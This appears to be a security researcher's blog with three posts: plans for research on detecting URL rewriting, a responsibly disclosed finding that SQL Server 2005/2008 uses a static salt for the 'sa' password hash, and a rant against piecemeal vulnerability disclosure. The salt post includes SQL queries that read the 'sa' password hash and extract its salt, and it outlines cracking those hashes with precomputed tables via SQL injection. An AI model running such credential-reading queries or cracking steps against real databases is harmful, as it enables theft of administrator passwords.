on security research

I’ve been pondering URL rewriting for the past couple of days – trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.
As I have been thinking about this, it occurred to me that, despite the proliferation of security research whitepapers and blog posts, there is a scarcity of ‘this is the process I went through to do this research’ information out there.

There are mountains of articles and documents, with dizzying arrays of statistics and metrics (often intermingled with a fair amount of marketing fluff), and yet most of the whitepapers, and certainly the various conference presentations, simply don’t talk about the process – preferring instead to present the end results.
As security professionals, we gather together at a multitude of conferences where we do a wonderful job displaying all of this shiny data and showing off new marvelous tricks to each other with varying degrees of self-indulgence. Yet most of how we came to have such cool stuff is left out of the picture entirely.

I understand why that is, of course. Simply put, the process is boring! It’s full of failure, and repeatedly throwing things at a wall and observing what happens. Nobody wants to sit in a small room with a couple hundred hackers listening to someone drone on for an hour about how “this didn’t work…and neither did this”, I get that. Added to that is the fact that, in some cases, the research is being done for a corporate (or government) entity. In such a situation, the process may be withheld not from a lack of desire to share on the researcher’s part, but because they are not permitted to do so by the organization for which the work was done.

Despite these reasons, in my opinion it is a disservice to ourselves, to the profession, and to others whom may be interested in performing their own research, when we all we do is deliver an end product in glossy PDF or a shiny PowerPoint presentation. That is simply not research, it’s promotion. Research, in an academic sense, implies documenting the entire process: both success and failure. This is not what I find when I look at the typical infosec industry output.

Accordingly, I’ve decided that I will share how I go about this particular project, and not just release some PDF or tool as a result of it. I’ll post my process here, any notes and thoughts, as well as any code I come up with. (Well, links to code anyway. I’ll probably keep the code itself in github).

One of the reasons I’m doing this is that I expect to fail. =)

As I’ve considered how one can detect URL rewriting, and as I’ve started investigating the details of how it works, my initial thought is that detecting it simply won’t be possible.

If that’s correct, I think it’s important that I present what I tried, along with the fact that ultimately it didn’t work. That’s vital information, in that it prevents someone else from wasting cycles repeating a process that’s already been done.

As well, understanding why something failed may lead to discovering a way to succeed.

OK… this rant being done now, my next post will start the process of documenting my research into detecting URL rewriting.

SQL Server 2005 (and 2008) Static Salt

While performing a database security review for a client, I noticed that the password hashes for the ‘sa’ user in the master.sys.sql_logins table all had the same salt. This was true on 4 separate SQL server instances across 4 different hosts.

Naturally, this piqued my curiousity, so I proceeded to investigate on as many SQL Server 2005 instances as I could get my hands on, and found that the salt was the same across the board.

To expound a bit:
If you run the following SQL statement:

SELECT password_hash FROM master.sys.sql_logins WHERE name = 'sa'

the whole password hash looks something like this:

0x01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21

The way that value breaks down is like so:

0x         : this is a hex value (the column is of type varbinary)
0100       : "throw away" constant bytes
4086CEB6   : the hash salt

the remainder of the value is the hashed password value.

Since we’re only interested in bytes 3 – 6, we can use the SQL SUBSTRING() function to pull the part we care about like so:

  SELECT SUBSTRING(password_hash,3,4) AS sa_hash_bytes
  FROM master.sys.sql_logins WHERE name = 'sa';

On each SQL Server instance I tested, the salt was the same
(0x4086CEB6)

This was true across Service Packs, and differing versions of both the DBMS platform as well as OS.

Here’s the output from ‘SELECT @@version’ on my test instances (minus the date and copyright):

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 6.0 (Build 6001: Service Pack 1)

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

I did some checking to see if this was a known issue, and was unable to find either an article/post describing this, nor an individual in the industry that had heard about it.

While this isn’t a “sexy” BoF or anything, it does leaves SQL server administrative passwords open to password cracking (eg. by using a precomputed table of SHA1 hashes using the static known salt, one can dramatically decrease the time it takes to crack an sa user password…on any SQL Server 2005 or 2008 instance.) Additionally, once a password has been acquired, it may be possible to use that same password in other locations on a network if the administrators use a common password (or a common OS image for servers…).

The real risk this poses is fairly minor, since by default in the affected SQL Server versions normal users lack access to the column containing the password hash. However, there are a great deal of applications out there which use privileged accounts to access the database back end they use; and there are an even greater number of applications which contain SQL Injection vulnerabilities. In my mind, there’s likely to be a fair amount of overlap in those 2 vectors, which would then leave a system potentially exposed to exploitation through this method.

Accordingly I decided to contact Microsoft. (I’ll leave discussion about Full Disclosure for some other post) I have to say, it was pretty decent working with the MSRC, they were quite competent and very forthcoming. Whatever else can be said about Microsoft, it’s clear that they have come a long way in dealing with vulnerabilities, which I am very happy to report.

The end result of all this is a Microsoft KB Article that explains more about the issue, along with some workarounds. According to that article, this will be fixed in SQL Server service packs at some point.

For those that are curious, the entire process took less than 3 months (I first reported the issue to Microsoft on December 11, 2009.) In my opinion, that’s an acceptable time frame for a large company to address what is an admittedly minor security issue, particularly given the fact that there are a number of major (and minor) holidays which take place in that time span.

About Disclosure

Let me start off by saying that I wish I had time to sit down and write this in a very concise, coherent manner. Unfortunately, I don’t, so instead of a well written post, here’s a rapid brain dump.

A couple of researchers (Robert E. Lee and Jack C. Louis) have recently been making a very large amount of press for discovering a new vulnerability in TCP. (see this blog post for a starting point).

The researchers are fairly well respected (among other things, they authored unicornscan, which is a tool that I am quite fond of).

Like Dan Kaminsky and the DNS fiasco not too long ago, they have decided to go with what a colleague of mine accurately referred to as “dribble disclosure”, that is, they’ve said there’s a problem, and they’ve given a large number of interviews giving out bits and pieces of what it may be, how they found it, etc. but they have not come out all the way and said precisely what the issue is.

However, unlike Dan Kaminsky, they’ve done this *before* any patching of any kind has been released. It was bad enough trying to deal with this type of disclosure *after* vendors had already had a chance to patch, trying to do it without that benefit is insane.

The problem with this type of disclosure is that it leads to a gigantic circus of FUD, both in the media and otherwise. For example, there’s some debate in various technical circles as to whether or not they have actually discovered anything new, or whether they’ve rediscovered older known issues.

I’m giving them the benefit of the doubt and presuming that they have in fact found something new, but without information, who knows? It’s all guesswork.

As for the media, I wish it was only the uninformed “mass” media that were spreading unrest and FUD, unfortunately even security researchers are contributing to the festivities.

For example, Robert Hansen (or RSnake as he is known) makes the following statement in his take:

I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia.

Are you kidding me? We’ve gone from no details at all to suddenly power grids being knocked offline. Never mind the fact that it’s extremely unlikely (read: not gonna happen) that a device which controls the power grid of an area is directly connected to the internet. Devices that display power consumption/usage maybe, but not devices that control where that power is going and whether or not a given path is online.

Fyodor (of nmap fame) has posted his guess on the details of this new vulnerability (and an echo of my frustration at this type of disclosure as well), however Robert E. Lee replies that while Fyodor has very valid points and explains a bit of how their tool works, he doesn’t quite explain the attack they’ve found.

That’s one of the points of this rant: Smart people *are* going to figure out what the problem is. They may be “good guys”, or they may be “bad guys” (in my opinion it is likely that both sides will figure it out). Either way, there are certainly enough clues given in the various reports/podcasts to enable an individual that is clueful about the protocol to figure out a likely scenario.

To make matters worse, this time there are at least five unique vulnerabilities which have been documented by Robert and Jack. This of course increases the odds that the exploit will be found (that is, someone will figure at least one of the five out, if not all of them.)

So what really is the point of disclosing this way?
It isn’t helping anyone except the media and the researchers (because they get to revel in the media circus while it lasts).

More specifically:

    • It doesn’t protect end users

 

    • It doesn’t help administrators

 

    • It doesn’t even help security researchers other than those doing the dribbling, because rather than allowing one to try to find ways to fix the problem, or even new ways to apply the problem to other areas, it forces them to try to recreate what’s already been done using a disjointed trail of clues.

So, why do it this way?
Disclosure is simple really, either do it, or don’t.

Personally, I think “full disclosure” (eg. ‘do it’) is best.
Whether you do so before or after “responsible” vendor notification, I don’t care really. But get all the information out there when you do it, or keep your mouth shut until you’re ready to do so.

I’m disgusted with this “new way” of doing things, and I’ve decided to coin a term for this method: discloscharades

Just like the game charades, this “half informed” nonsense ends up making the person dribbling clues out look silly or worse, and it leaves the people doing the guesswork frustrated and annoyed.